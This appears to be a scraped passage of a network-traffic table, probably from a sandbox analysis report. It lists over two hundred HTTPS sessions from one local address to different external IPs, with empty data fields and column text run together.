                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24112192.168.2.234154090.163.110.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24113192.168.2.2338432151.171.121.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24114192.168.2.2358282208.2.42.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24115192.168.2.233277460.41.212.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24116192.168.2.233648412.135.146.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24117192.168.2.2340300180.56.160.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24118192.168.2.2358088121.114.43.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24119192.168.2.234593649.88.108.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24120192.168.2.2346040130.65.174.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24121192.168.2.2340262161.208.230.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24122192.168.2.2350248142.176.102.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24123192.168.2.2340840125.45.151.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24124192.168.2.235970459.181.23.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24125192.168.2.2342224180.84.182.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24126192.168.2.23549422.127.29.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24127192.168.2.2346480185.200.66.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24128192.168.2.2345370154.9.79.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24129192.168.2.235063894.122.15.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24130192.168.2.2339098212.153.213.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24131192.168.2.234116450.121.89.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24132192.168.2.2346918128.166.184.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24133192.168.2.2360624107.151.55.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24134192.168.2.234278643.175.238.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24135192.168.2.235565063.211.210.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24136192.168.2.2333562124.201.71.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24137192.168.2.2350184198.196.16.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24138192.168.2.233646299.62.49.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24139192.168.2.2336174141.152.253.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24140192.168.2.233857247.181.234.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24141192.168.2.23454064.177.239.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24142192.168.2.234500038.185.109.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24143192.168.2.2360370190.234.199.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24144192.168.2.2343120139.146.7.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24145192.168.2.233348292.12.184.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24146192.168.2.233410235.156.160.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24147192.168.2.234816049.97.136.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24148192.168.2.2337812126.194.254.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24149192.168.2.2344880197.129.198.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24150192.168.2.2355242145.160.173.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24151192.168.2.2358702104.131.37.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24152192.168.2.23405088.82.80.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24153192.168.2.2359794170.218.114.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24154192.168.2.2359314192.202.3.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24155192.168.2.233925273.241.195.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24156192.168.2.235033441.225.73.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24157192.168.2.23523248.194.30.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24158192.168.2.2354862168.104.240.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24159192.168.2.2340766144.205.106.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24160192.168.2.2356012185.135.87.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24161192.168.2.2343026144.235.149.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24162192.168.2.234771013.187.109.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24163192.168.2.2350716177.136.44.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24164192.168.2.2350068201.229.189.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24165192.168.2.235168450.135.145.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24166192.168.2.2355924211.0.36.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24167192.168.2.235284888.251.64.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24168192.168.2.2345794114.12.245.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24169192.168.2.234860650.226.147.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24170192.168.2.2352158134.201.81.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24171192.168.2.2334746107.36.216.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24172192.168.2.23567349.53.105.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24173192.168.2.2357188176.78.50.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24174192.168.2.235081482.244.160.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24175192.168.2.235277223.237.190.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24176192.168.2.23477122.225.96.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24177192.168.2.2340596116.126.144.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24178192.168.2.235062814.12.72.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24179192.168.2.23597362.13.251.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24180192.168.2.234073014.95.136.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24181192.168.2.233300682.144.174.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24182192.168.2.234817819.223.36.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24183192.168.2.2333856183.201.146.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24184192.168.2.2352958154.194.136.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24185192.168.2.2346768169.209.146.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24186192.168.2.2340168166.181.7.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24187192.168.2.234290081.246.53.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24188192.168.2.2358828222.108.124.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24189192.168.2.2341770203.174.193.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24190192.168.2.2337968123.251.111.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24191192.168.2.233785241.196.149.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24192192.168.2.2340878165.226.94.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24193192.168.2.2358750218.106.191.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24194192.168.2.2344498199.147.253.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24195192.168.2.235122268.130.172.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24196192.168.2.2341552222.184.186.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24197192.168.2.2343236151.81.227.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24198192.168.2.233734647.34.93.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24199192.168.2.235838452.5.254.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24200192.168.2.233512864.3.12.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24201192.168.2.2341100178.0.87.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24202192.168.2.235785813.255.225.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24203192.168.2.2335454192.59.57.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24204192.168.2.23602724.31.217.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24205192.168.2.2348454111.49.92.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24206192.168.2.2336458162.22.124.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24207192.168.2.2357706163.217.111.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24208192.168.2.2360452149.233.72.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24209192.168.2.236009491.49.32.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24210192.168.2.2339624216.82.129.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24211192.168.2.2349602109.225.114.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24212192.168.2.234553087.187.200.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24213192.168.2.234123884.249.122.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24214192.168.2.234704240.109.142.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24215192.168.2.2336684178.78.205.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24216192.168.2.2337850222.223.179.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24217192.168.2.233753037.42.55.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24218192.168.2.2353408141.92.206.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24219192.168.2.2347600179.139.187.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24220192.168.2.2351538178.211.73.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24221192.168.2.2354884180.88.21.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24222192.168.2.235705037.122.139.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24223192.168.2.233322427.8.227.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24224192.168.2.235798819.60.223.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24225192.168.2.2360162114.46.40.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24226192.168.2.2336812206.7.34.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24227192.168.2.235596661.24.222.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24228192.168.2.235678836.166.104.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24229192.168.2.2339390140.52.86.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24230192.168.2.2359346146.216.207.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24231192.168.2.2348936219.116.127.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24232192.168.2.2352784158.151.199.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24233192.168.2.235771285.183.211.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24234192.168.2.2344534198.89.66.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24235192.168.2.2352528155.195.162.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24236192.168.2.233793420.61.71.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24237192.168.2.2359452213.71.21.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24238192.168.2.234515065.140.244.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24239192.168.2.2358966167.109.231.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24240192.168.2.2357066101.96.234.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24241192.168.2.2341338105.177.11.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24242192.168.2.2347680164.19.39.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24243192.168.2.233489692.188.84.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24244192.168.2.2345380141.238.91.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24245192.168.2.2341354102.90.112.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24246192.168.2.235644043.48.130.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24247192.168.2.2334100216.215.4.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24248192.168.2.2333620162.145.55.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24249192.168.2.2334422181.137.237.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24250192.168.2.2337266103.9.201.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24251192.168.2.2338002186.122.67.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24252192.168.2.234316842.190.101.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24253192.168.2.234324050.232.16.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24254192.168.2.2339464205.139.150.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24255192.168.2.2353742209.46.34.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24256192.168.2.2335710182.65.179.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24257192.168.2.233728496.85.135.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24258192.168.2.2352754177.122.12.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24259192.168.2.2357966202.155.137.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24260192.168.2.2334280158.155.42.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24261192.168.2.2357494190.8.51.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24262192.168.2.2353820133.165.219.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24263192.168.2.2351510145.70.152.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24264192.168.2.2347408206.116.165.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24265192.168.2.235524883.87.239.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24266192.168.2.233356039.110.217.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24267192.168.2.2336348181.190.168.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24268192.168.2.2345114200.161.19.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24269192.168.2.235633483.253.117.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24270192.168.2.233795247.91.181.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24271192.168.2.2351426108.219.196.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24272192.168.2.2341908105.69.131.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24273192.168.2.2341906101.89.237.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24274192.168.2.234499245.155.173.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24275192.168.2.235657457.99.238.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24276192.168.2.2351160116.212.148.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24277192.168.2.2355496172.53.244.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24278192.168.2.2344530150.248.115.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24279192.168.2.2352770200.118.6.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24280192.168.2.2356638140.247.40.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24281192.168.2.234301447.194.77.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24282192.168.2.2354900142.67.150.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24283192.168.2.233711087.58.140.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24284192.168.2.2357954217.197.89.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24285192.168.2.2345998197.14.85.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24286192.168.2.234368299.10.101.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24287192.168.2.2338302160.179.73.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24288192.168.2.2351410108.130.103.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24289192.168.2.2346076108.55.40.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24290192.168.2.2334440115.14.176.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24291192.168.2.235771237.170.140.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24292192.168.2.2359168170.190.122.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24293192.168.2.2336548114.164.97.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24294192.168.2.2340864136.170.205.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24295192.168.2.236001486.173.151.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24296192.168.2.2357346135.223.69.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24297192.168.2.2356830129.139.229.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24298192.168.2.233507041.245.144.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24299192.168.2.235067440.59.233.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24300192.168.2.2336816119.34.95.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24301192.168.2.235646427.141.161.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24302192.168.2.2356130147.217.176.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24303192.168.2.2346344158.143.90.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24304192.168.2.2357088188.148.154.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24305192.168.2.2345430121.211.122.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24306192.168.2.2339176125.215.123.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24307192.168.2.2357366145.222.172.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24308192.168.2.2352590170.94.134.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24309192.168.2.235339849.33.75.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24310192.168.2.233482038.0.144.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24311192.168.2.235623876.75.195.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24312192.168.2.2346422128.106.204.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24313192.168.2.2354044174.229.33.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24314192.168.2.2340886162.216.153.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24315192.168.2.234339492.12.201.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24316192.168.2.2338974157.119.78.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24317192.168.2.2360092134.150.148.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24318192.168.2.234130064.37.5.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24319192.168.2.2354776165.64.234.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24320192.168.2.233528631.66.217.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24321192.168.2.234870425.102.144.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24322192.168.2.2354638198.234.143.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24323192.168.2.234094652.250.122.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24324192.168.2.2346196102.61.139.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24325192.168.2.233610862.255.192.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24326192.168.2.2340232173.23.218.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24327192.168.2.2351942161.167.87.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24328192.168.2.2343402129.1.132.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24329192.168.2.2355930122.146.158.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24330192.168.2.2352076103.190.169.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24331192.168.2.234942244.144.32.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24332192.168.2.23600084.57.29.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24333192.168.2.2352276167.241.13.121443
